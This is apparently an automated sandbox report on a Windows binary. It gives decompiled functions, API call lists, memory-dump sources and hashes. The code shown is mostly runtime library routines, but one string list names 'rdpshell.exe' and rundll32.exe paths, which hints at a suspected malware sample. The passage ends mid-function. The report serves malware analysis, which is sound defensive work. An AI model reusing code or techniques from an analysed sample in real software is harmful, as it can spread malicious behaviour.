                                                  • Part of subcall function 007864C8: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,007865CA,?,00000001,00000000,00416589), ref: 007864DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Locale$InfoThread
                                                • String ID: AMPM$ fA$09A$0fA$2$AMPM $m/d/yy$mmmm d, yyyy
                                                • API String ID: 4232894706-3960306321
                                                • Opcode ID: ef4a070c670a389abddd9e0c7a0432e5a17d450dfe487b038de32d0c4cc554b5
                                                • Instruction ID: aaec9947123bb4d1b0f83edef034abc6e5ae9158075779a10a9d47a38ace292f
                                                • Opcode Fuzzy Hash: ef4a070c670a389abddd9e0c7a0432e5a17d450dfe487b038de32d0c4cc554b5
                                                • Instruction Fuzzy Hash: 45718030740449EBDB01FBA4D845BDE76BAEF88740F50C076F508AB24ADB3DDA468769
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 62%
                                                			E00417598(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				char* _v8;
                                                				long _v12;
                                                				short _v140;
                                                				short _v2188;
                                                				void* _t15;
                                                				char* _t17;
                                                				intOrPtr _t19;
                                                				intOrPtr _t30;
                                                				long _t48;
                                                				intOrPtr _t56;
                                                				intOrPtr _t57;
                                                				int _t61;
                                                				void* _t64;
                                                
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_v8 = 0;
                                                				_push(_t64);
                                                				_push(0x4176bd);
                                                				_push( *[fs:ecx]);
                                                				 *[fs:ecx] = _t64 + 0xfffff778;
                                                				_t61 = E004173A0(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
                                                				_t17 =  *0x4ff0d0; // 0x500054
                                                				if( *_t17 == 0) {
                                                					_t19 =  *0x4fefc0; // 0x40c158
                                                					_t11 = _t19 + 4; // 0xffeb
                                                					LoadStringW(E00408664( *0x503620),  *_t11,  &_v140, 0x40);
                                                					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
                                                				} else {
                                                					_t30 =  *0x4fefe8; // 0x50033c
                                                					E00404608(E00404944(_t30));
                                                					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
                                                					_push(_t48);
                                                					E00408478();
                                                					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
                                                					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
                                                					WriteFile(GetStdHandle(0xfffffff4), 0x4176d8, 2,  &_v12, 0);
                                                				}
                                                				_pop(_t56);
                                                				 *[fs:eax] = _t56;
                                                				_push(0x4176c4);
                                                				_t57 =  *0x417568; // 0x41756c
                                                				return E0040859C( &_v8, _t57);
                                                 			}

                                                APIs
                                                  • Part of subcall function 004173A0: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041754C), ref: 004173D3
                                                  • Part of subcall function 004173A0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004173F7
                                                  • Part of subcall function 004173A0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00417412
                                                  • Part of subcall function 004173A0: LoadStringW.USER32(00000000,0000FFEA,?,00000100), ref: 004174AD
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,004176BD), ref: 004175F9
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041762C
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041763E
                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00417644
                                                • GetStdHandle.KERNEL32(000000F4,004176D8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 00417658
                                                • WriteFile.KERNEL32(00000000,000000F4,004176D8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041765E
                                                • LoadStringW.USER32(00000000,0000FFEB,?,00000040), ref: 00417682
                                                • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041769C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                 • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                • String ID: luA
                                                • API String ID: 135118572-3978237923
                                                • Opcode ID: 81e3b915b899ff7018954e0c3b2f462436dec9106beb02eccbf0b296c2bf358f
                                                • Instruction ID: 575b4e763a00b0bec5c17776c31b2c26187b782050d429d4d4936ba6163c07df
                                                • Opcode Fuzzy Hash: 81e3b915b899ff7018954e0c3b2f462436dec9106beb02eccbf0b296c2bf358f
                                                • Instruction Fuzzy Hash: 383141B1644204BFE710EB95CC82FEA76ACEB04714F50417AB604F71D1DE746E808B6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E00408E58(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                				char _v8;
                                                				void* _t18;
                                                				signed short _t28;
                                                				intOrPtr _t35;
                                                				intOrPtr* _t44;
                                                				intOrPtr _t47;
                                                
                                                				_t42 = __edi;
                                                				_push(0);
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_t44 = __edx;
                                                				_t28 = __eax;
                                                				_push(_t47);
                                                				_push(0x408f5c);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t47;
                                                				EnterCriticalSection(0x502c0c);
                                                				if(_t28 !=  *0x502c24) {
                                                					LeaveCriticalSection(0x502c0c);
                                                					E004069A8(_t44);
                                                					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
                                                						if( *0x502c08 == 0) {
                                                							_t18 = E00408B40(_t28, _t28, _t44, __edi, _t44);
                                                							L004027FC();
                                                							if(_t28 != _t18) {
                                                								if( *_t44 != 0) {
                                                									_t18 = E004074B0(_t44, E00408F74);
                                                								}
                                                								L004027FC();
                                                								E00408B40(_t18, _t28,  &_v8, _t42, _t44);
                                                								E004074B0(_t44, _v8);
                                                							}
                                                						} else {
                                                							E00408D3C(_t28, _t44);
                                                						}
                                                					}
                                                					EnterCriticalSection(0x502c0c);
                                                					 *0x502c24 = _t28;
                                                					E004089C0(0x502c26, E00407330( *_t44), 0xaa);
                                                					LeaveCriticalSection(0x502c0c);
                                                				} else {
                                                					E004073C4(_t44, 0x55, 0x502c26);
                                                					LeaveCriticalSection(0x502c0c);
                                                				}
                                                				_pop(_t35);
                                                				 *[fs:eax] = _t35;
                                                				_push(E00408F63);
                                                				return E004069A8( &_v8);
                                                 			}

                                                APIs
                                                • EnterCriticalSection.KERNEL32(00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883,?,?,00000000,00000000,00000000), ref: 00408E76
                                                • LeaveCriticalSection.KERNEL32(00502C0C,00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883,?,?,00000000,00000000), ref: 00408E9A
                                                • LeaveCriticalSection.KERNEL32(00502C0C,00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883,?,?,00000000,00000000), ref: 00408EA9
                                                • IsValidLocale.KERNEL32(00000000,00000002,00502C0C,00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883), ref: 00408EBB
                                                • EnterCriticalSection.KERNEL32(00502C0C,00000000,00000002,00502C0C,00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883), ref: 00408F18
                                                • LeaveCriticalSection.KERNEL32(00502C0C,00502C0C,00000000,00000002,00502C0C,00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883), ref: 00408F41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                 • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                • String ID: en-US,en,
                                                • API String ID: 975949045-3579323720
                                                • Opcode ID: 486056097c644745153e390375a7604f86461bb147bf653f343bd5b99f6a0b8a
                                                • Instruction ID: b0fb0639c22291b311ffd7e014b7402ceef5e9ca1ca2eb31d877daafb52af612
                                                • Opcode Fuzzy Hash: 486056097c644745153e390375a7604f86461bb147bf653f343bd5b99f6a0b8a
                                                • Instruction Fuzzy Hash: 6F21C02070460067E725B77A8E5B71E2699AB44708F60443FB480B32D2DEBC9D0596AF
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNEL32(00000000,FFFFFFDC,007731CA), ref: 007732B3
                                                • Sleep.KERNEL32(0000000A,00000000,FFFFFFDC,007731CA), ref: 007732C9
                                                • Sleep.KERNEL32(00000000,?,?,FFFFFFDC,007731CA), ref: 007732F7
                                                • Sleep.KERNEL32(0000000A,00000000,?,?,FFFFFFDC,007731CA), ref: 0077330D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: x+P$x+P
                                                • API String ID: 3472027048-2134562320
                                                • Opcode ID: 6a0de7adfa187165a96d4983837ab3814e824e6b25107f4c3aea22e2ed4c806d
                                                • Instruction ID: ddbdd5a4d3ca0cfd4b2e644b3c233b253d4e0062526243a87ee6cfd39e8a1491
                                                • Opcode Fuzzy Hash: 6a0de7adfa187165a96d4983837ab3814e824e6b25107f4c3aea22e2ed4c806d
                                                • Instruction Fuzzy Hash: 57C134726013508BDF15CF28E88472ABBE0FB95350F08C2AED45C8B3D2D7789A49E790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E0040B80C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                				long _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				void* _v20;
                                                				long _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				struct HINSTANCE__** _v48;
                                                				CHAR* _v52;
                                                				void _v56;
                                                				long _v60;
                                                				_Unknown_base(*)()* _v64;
                                                				struct HINSTANCE__* _v68;
                                                				CHAR* _v72;
                                                				signed int _v76;
                                                				CHAR* _v80;
                                                				intOrPtr* _v84;
                                                				void* _v88;
                                                				void _v92;
                                                				signed int _t104;
                                                				signed int _t106;
                                                				signed int _t108;
                                                				long _t113;
                                                				intOrPtr* _t119;
                                                				void* _t124;
                                                				void _t126;
                                                				long _t128;
                                                				struct HINSTANCE__* _t142;
                                                				long _t166;
                                                				signed int* _t190;
                                                				_Unknown_base(*)()* _t191;
                                                				void* _t194;
                                                				intOrPtr _t196;
                                                
                                                				_push(_a4);
                                                				memcpy( &_v56, 0x4fdc28, 8 << 2);
                                                				_pop(_t194);
                                                				_v56 =  *0x4fdc28;
                                                				_v52 = E0040BCBC( *0x004FDC2C);
                                                				_v48 = E0040BCCC( *0x004FDC30);
                                                				_v44 = E0040BCDC( *0x004FDC34);
                                                				_v40 = E0040BCEC( *0x004FDC38);
                                                				_v36 = E0040BCEC( *0x004FDC3C);
                                                				_v32 = E0040BCEC( *0x004FDC40);
                                                				_v28 =  *0x004FDC44;
                                                				memcpy( &_v92, 0x4fdc48, 9 << 2);
                                                				_t196 = _t194;
                                                				_v88 = 0x4fdc48;
                                                				_v84 = _a8;
                                                				_v80 = _v52;
                                                				if((_v56 & 0x00000001) == 0) {
                                                					_t166 =  *0x4fdc6c; // 0x0
                                                					_v8 = _t166;
                                                					_v8 =  &_v92;
                                                					RaiseException(0xc06d0057, 0, 1,  &_v8);
                                                					return 0;
                                                				}
                                                				_t104 = _a8 - _v44;
                                                				_t142 =  *_v48;
                                                				if(_t104 < 0) {
                                                					_t104 = _t104 + 3;
                                                				}
                                                				_v12 = _t104 >> 2;
                                                				_t106 = _v12;
                                                				_t190 = (_t106 << 2) + _v40;
                                                				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
                                                				_v76 = _t108;
                                                				if(_t108 == 0) {
                                                					_v72 =  *_t190 & 0x0000ffff;
                                                				} else {
                                                					_v72 = E0040BCFC( *_t190) + 2;
                                                				}
                                                				_t191 = 0;
                                                				if( *0x503630 == 0) {
                                                					L10:
                                                					if(_t142 != 0) {
                                                						L25:
                                                						_v68 = _t142;
                                                						if( *0x503630 != 0) {
                                                							_t191 =  *0x503630(2,  &_v92);
                                                						}
                                                						if(_t191 != 0) {
                                                							L36:
                                                							if(_t191 == 0) {
                                                								_v60 = GetLastError();
                                                								if( *0x503634 != 0) {
                                                									_t191 =  *0x503634(4,  &_v92);
                                                								}
                                                								if(_t191 == 0) {
                                                									_t113 =  *0x4fdc74; // 0x0
                                                									_v24 = _t113;
                                                									_v24 =  &_v92;
                                                									RaiseException(0xc06d007f, 0, 1,  &_v24);
                                                									_t191 = _v64;
                                                								}
                                                							}
                                                							goto L41;
                                                						} else {
                                                							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
                                                								L35:
                                                								_t191 = GetProcAddress(_t142, _v72);
                                                								goto L36;
                                                							} else {
                                                								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
                                                								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
                                                									if(_t191 == 0) {
                                                										goto L35;
                                                									}
                                                									L41:
                                                									 *_a8 = _t191;
                                                									goto L42;
                                                								}
                                                							}
                                                						}
                                                					}
                                                					if( *0x503630 != 0) {
                                                						_t142 =  *0x503630(1,  &_v92);
                                                					}
                                                					if(_t142 == 0) {
                                                						_t142 = LoadLibraryA(_v80);
                                                					}
                                                					if(_t142 != 0) {
                                                						L20:
                                                						if(_t142 == E0040B190(_v48, _t142)) {
                                                							FreeLibrary(_t142);
                                                						} else {
                                                							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
                                                								_t124 = LocalAlloc(0x40, 8);
                                                								_v20 = _t124;
                                                								if(_t124 != 0) {
                                                									 *((intOrPtr*)(_v20 + 4)) = _t196;
                                                									_t126 =  *0x4fdc24; // 0x0
                                                									 *_v20 = _t126;
                                                									 *0x4fdc24 = _v20;
                                                								}
                                                							}
                                                						}
                                                						goto L25;
                                                					} else {
                                                						_v60 = GetLastError();
                                                						if( *0x503634 != 0) {
                                                							_t142 =  *0x503634(3,  &_v92);
                                                						}
                                                						if(_t142 != 0) {
                                                							goto L20;
                                                						} else {
                                                							_t128 =  *0x4fdc70; // 0x0
                                                							_v16 = _t128;
                                                							_v16 =  &_v92;
                                                							RaiseException(0xc06d007e, 0, 1,  &_v16);
                                                							return _v64;
                                                						}
                                                					}
                                                				} else {
                                                					_t191 =  *0x503630(0,  &_v92);
                                                					if(_t191 == 0) {
                                                						goto L10;
                                                					} else {
                                                						L42:
                                                						if( *0x503630 != 0) {
                                                							_v60 = 0;
                                                							_v68 = _t142;
                                                							_v64 = _t191;
                                                							 *0x503630(5,  &_v92);
                                                						}
                                                						return _t191;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040B8C4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 3c69c3a2c73478c5e45cecb158df72672313abf9503702f4a583c6c81048d671
                                                • Instruction ID: 0ec9b079ba997fd56ee87b98193e146ec9b68534d60f81be73d745ca747ed7da
                                                • Opcode Fuzzy Hash: 3c69c3a2c73478c5e45cecb158df72672313abf9503702f4a583c6c81048d671
                                                • Instruction Fuzzy Hash: 9CA170B5A002099FDB24CFA8D881BAEB7F5FB58300F10413AE515BB390DB749945CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 8O$C:\Windows\System32\rundll32.exe$D$rdpshell.exe$system32\rundll32.exe$O
                                                • API String ID: 0-2077156839
                                                • Opcode ID: 69cfe882e65ef2feb8b57c3542bed65357a34dbd33a214a592ec6338d3639887
                                                • Instruction ID: a0acc53d7566dfec7757381ac815b47a2e3664634cde6d0c22cc286e61a40720
                                                • Opcode Fuzzy Hash: 69cfe882e65ef2feb8b57c3542bed65357a34dbd33a214a592ec6338d3639887
                                                • Instruction Fuzzy Hash: 7722F771910249DFDB10DFAAE885AADBBF5FB08306F11843AE404E7271D775A960CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E00403874(int __eax, void* __ecx, void* __edx) {
                                                				long _v12;
                                                				int _t4;
                                                				long _t7;
                                                				void* _t11;
                                                				long _t12;
                                                				void* _t13;
                                                				long _t18;
                                                
                                                				_t4 = __eax;
                                                				_t24 = __edx;
                                                				_t20 = __eax;
                                                				if( *0x500054 == 0) {
                                                					_push(0x2010);
                                                					_push(__edx);
                                                					_push(__eax);
                                                					_push(0);
                                                					L00402844();
                                                				} else {
                                                					_t7 = E00406DA4(__edx);
                                                					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
                                                					_t11 =  *0x4fd05c; // 0x4029e4
                                                					_t12 = E00406DA4(_t11);
                                                					_t13 =  *0x4fd05c; // 0x4029e4
                                                					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
                                                					_t18 = E00406DA4(_t20);
                                                					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
                                                				}
                                                				return _t4;
                                                			}

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F4,004029E8,00000000,?,00000000,?,?,00000000,0040421F), ref: 00403896
                                                • WriteFile.KERNEL32(00000000,000000F4,004029E8,00000000,?,00000000,?,?,00000000,0040421F), ref: 0040389C
                                                • GetStdHandle.KERNEL32(000000F4,004029E4,00000000,?,00000000,00000000,000000F4,004029E8,00000000,?,00000000,?,?,00000000,0040421F), ref: 004038BB
                                                • WriteFile.KERNEL32(00000000,000000F4,004029E4,00000000,?,00000000,00000000,000000F4,004029E8,00000000,?,00000000,?,?,00000000,0040421F), ref: 004038C1
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,004029E4,00000000,?,00000000,00000000,000000F4,004029E8,00000000,?), ref: 004038D8
                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,004029E4,00000000,?,00000000,00000000,000000F4,004029E8,00000000), ref: 004038DE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: FileHandleWrite
                                                • String ID: )@
                                                • API String ID: 3320372497-3601550055
                                                • Opcode ID: 83033d0aa5524322eedb2eef276f9990ba4be1cd920fb4ccc56adaf2abc8a3e6
                                                • Instruction ID: 9e7843783f02372641eb41feef89d2fd432e8f50bade524b17204604d823b9d1
                                                • Opcode Fuzzy Hash: 83033d0aa5524322eedb2eef276f9990ba4be1cd920fb4ccc56adaf2abc8a3e6
                                                • Instruction Fuzzy Hash: F10136A27442107DE640B7AADD8AF5B17CC9F8572DF10463B7114F20D3C9BC8D54927A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E00403528(signed int __eax, signed int __edx, void* __edi) {
                                                				signed int __ebx;
                                                				void* __esi;
                                                				signed int _t69;
                                                				signed int _t78;
                                                				signed int _t93;
                                                				long _t94;
                                                				void* _t100;
                                                				signed int _t102;
                                                				signed int _t109;
                                                				signed int _t115;
                                                				signed int _t123;
                                                				signed int _t129;
                                                				void* _t131;
                                                				signed int _t140;
                                                				unsigned int _t148;
                                                				signed int _t150;
                                                				long _t152;
                                                				signed int _t156;
                                                				intOrPtr _t161;
                                                				signed int _t166;
                                                				signed int _t170;
                                                				unsigned int _t171;
                                                				intOrPtr _t174;
                                                				intOrPtr _t192;
                                                				signed int _t195;
                                                				signed int _t196;
                                                				signed int _t197;
                                                				void* _t205;
                                                				unsigned int _t207;
                                                				signed int _t213;
                                                				void* _t225;
                                                				signed int _t227;
                                                				signed int _t228;
                                                				signed int _t230;
                                                				void* _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				signed int _t238;
                                                				signed int _t241;
                                                				void* _t243;
                                                				intOrPtr* _t244;
                                                
                                                				_t176 = __edx;
                                                				_t66 = __eax;
                                                				_t166 =  *(__eax - 4);
                                                				_t217 = __eax;
                                                				if((_t166 & 0x00000007) != 0) {
                                                					__eflags = _t166 & 0x00000005;
                                                					if((_t166 & 0x00000005) != 0) {
                                                						_pop(_t217);
                                                						_pop(_t145);
                                                						__eflags = _t166 & 0x00000003;
                                                						if((_t166 & 0x00000003) == 0) {
                                                							_push(_t145);
                                                							_push(__eax);
                                                							_push(__edi);
                                                							_push(_t225);
                                                							_t244 = _t243 + 0xffffffe0;
                                                							_t218 = __edx;
                                                							_t202 = __eax;
                                                							_t69 =  *(__eax - 4);
                                                							_t148 = (0xfffffff0 & _t69) - 0x14;
                                                							if(0xfffffff0 >= __edx) {
                                                								__eflags = __edx - _t148 >> 1;
                                                								if(__edx < _t148 >> 1) {
                                                									_t150 = E00402FAC(__edx);
                                                									__eflags = _t150;
                                                									if(_t150 != 0) {
                                                										__eflags = _t218 - 0x40a2c;
                                                										if(_t218 > 0x40a2c) {
                                                											_t78 = _t202 - 0x10;
                                                											__eflags = _t78;
                                                											 *((intOrPtr*)(_t78 + 8)) = _t218;
                                                										}
                                                										E00402B68(_t202, _t218, _t150);
                                                										E00403330(_t202, _t202, _t225);
                                                									}
                                                								} else {
                                                									_t150 = __eax;
                                                									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
                                                								}
                                                							} else {
                                                								if(0xfffffff0 <= __edx) {
                                                									_t227 = __edx;
                                                								} else {
                                                									_t227 = 0xbadb9d;
                                                								}
                                                								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
                                                								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
                                                								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
                                                									L12:
                                                									_t150 = E00402FAC(_t227);
                                                									__eflags = _t150;
                                                									if(_t150 != 0) {
                                                										__eflags = _t227 - 0x40a2c;
                                                										if(_t227 > 0x40a2c) {
                                                											_t93 = _t150 - 0x10;
                                                											__eflags = _t93;
                                                											 *((intOrPtr*)(_t93 + 8)) = _t218;
                                                										}
                                                										E00402B38(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
                                                										E00403330(_t202, _t202, _t227);
                                                									}
                                                								} else {
                                                									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
                                                									_t94 =  *(_t244 + 0x10);
                                                									if(_t218 - _t148 >= _t94) {
                                                										goto L12;
                                                									} else {
                                                										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
                                                										if(_t94 < _t152) {
                                                											_t152 = _t94;
                                                										}
                                                										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
                                                											goto L12;
                                                										} else {
                                                											_t100 = _t202 - 0x10;
                                                											 *((intOrPtr*)(_t100 + 8)) = _t218;
                                                											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
                                                											_t150 = _t202;
                                                										}
                                                									}
                                                								}
                                                							}
                                                							return _t150;
                                                						} else {
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                					} else {
                                                						_t170 = _t166 & 0xfffffff0;
                                                						_push(__edi);
                                                						_t205 = _t170 + __eax;
                                                						_t171 = _t170 - 4;
                                                						_t156 = _t166 & 0x0000000f;
                                                						__eflags = __edx - _t171;
                                                						_push(_t225);
                                                						if(__edx > _t171) {
                                                							_t102 =  *(_t205 - 4);
                                                							__eflags = _t102 & 0x00000001;
                                                							if((_t102 & 0x00000001) == 0) {
                                                								L75:
                                                								asm("adc edi, 0xffffffff");
                                                								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
                                                								_t207 = _t171;
                                                								_t109 = E00402FAC(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
                                                								_t192 = _t176;
                                                								__eflags = _t109;
                                                								if(_t109 == 0) {
                                                									goto L73;
                                                								} else {
                                                									__eflags = _t228 - 0x40a2c;
                                                									if(_t228 > 0x40a2c) {
                                                										 *((intOrPtr*)(_t109 - 8)) = _t192;
                                                									}
                                                									_t230 = _t109;
                                                									E00402B38(_t217, _t207, _t109);
                                                									E00403330(_t217, _t207, _t230);
                                                									return _t230;
                                                								}
                                                							} else {
                                                								_t115 = _t102 & 0xfffffff0;
                                                								_t232 = _t171 + _t115;
                                                								__eflags = __edx - _t232;
                                                								if(__edx > _t232) {
                                                									goto L75;
                                                								} else {
                                                									__eflags =  *0x500055;
                                                									if(__eflags == 0) {
                                                										L66:
                                                										__eflags = _t115 - 0xb30;
                                                										if(_t115 >= 0xb30) {
                                                											E00402B84(_t205);
                                                											_t176 = _t176;
                                                											_t171 = _t171;
                                                										}
                                                										asm("adc edi, 0xffffffff");
                                                										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                                                										_t195 = _t232 + 4 - _t123;
                                                										__eflags = _t195;
                                                										if(_t195 > 0) {
                                                											 *(_t217 + _t232 - 4) = _t195;
                                                											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
                                                											_t233 = _t123;
                                                											__eflags = _t195 - 0xb30;
                                                											if(_t195 >= 0xb30) {
                                                												__eflags = _t123 + _t217;
                                                												E00402BC4(_t123 + _t217, _t171, _t195);
                                                											}
                                                										} else {
                                                											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
                                                											_t233 = _t232 + 4;
                                                										}
                                                										_t234 = _t233 | _t156;
                                                										__eflags = _t234;
                                                										 *(_t217 - 4) = _t234;
                                                										 *0x500ae4 = 0;
                                                										_t109 = _t217;
                                                										L73:
                                                										return _t109;
                                                									} else {
                                                										while(1) {
                                                											asm("lock cmpxchg [0x500ae4], ah");
                                                											if(__eflags == 0) {
                                                												break;
                                                											}
                                                											asm("pause");
                                                											__eflags =  *0x500985;
                                                											if(__eflags != 0) {
                                                												continue;
                                                											} else {
                                                												Sleep(0);
                                                												_t176 = _t176;
                                                												_t171 = _t171;
                                                												asm("lock cmpxchg [0x500ae4], ah");
                                                												if(__eflags != 0) {
                                                													Sleep(0xa);
                                                													_t176 = _t176;
                                                													_t171 = _t171;
                                                													continue;
                                                												}
                                                											}
                                                											break;
                                                										}
                                                										_t156 = 0x0000000f &  *(_t217 - 4);
                                                										_t129 =  *(_t205 - 4);
                                                										__eflags = _t129 & 0x00000001;
                                                										if((_t129 & 0x00000001) == 0) {
                                                											L74:
                                                											 *0x500ae4 = 0;
                                                											goto L75;
                                                										} else {
                                                											_t115 = _t129 & 0xfffffff0;
                                                											_t232 = _t171 + _t115;
                                                											__eflags = _t176 - _t232;
                                                											if(_t176 > _t232) {
                                                												goto L74;
                                                											} else {
                                                												goto L66;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							__eflags = __edx + __edx - _t171;
                                                							if(__edx + __edx < _t171) {
                                                								__eflags = __edx - 0xb2c;
                                                								if(__edx >= 0xb2c) {
                                                									L41:
                                                									_t32 = _t176 + 0xd3; // 0xbff
                                                									_t238 = (_t32 & 0xffffff00) + 0x30;
                                                									_t174 = _t171 + 4 - _t238;
                                                									__eflags =  *0x500055;
                                                									if(__eflags != 0) {
                                                										while(1) {
                                                											asm("lock cmpxchg [0x500ae4], ah");
                                                											if(__eflags == 0) {
                                                												break;
                                                											}
                                                											asm("pause");
                                                											__eflags =  *0x500985;
                                                											if(__eflags != 0) {
                                                												continue;
                                                											} else {
                                                												Sleep(0);
                                                												_t174 = _t174;
                                                												asm("lock cmpxchg [0x500ae4], ah");
                                                												if(__eflags != 0) {
                                                													Sleep(0xa);
                                                													_t174 = _t174;
                                                													continue;
                                                												}
                                                											}
                                                											break;
                                                										}
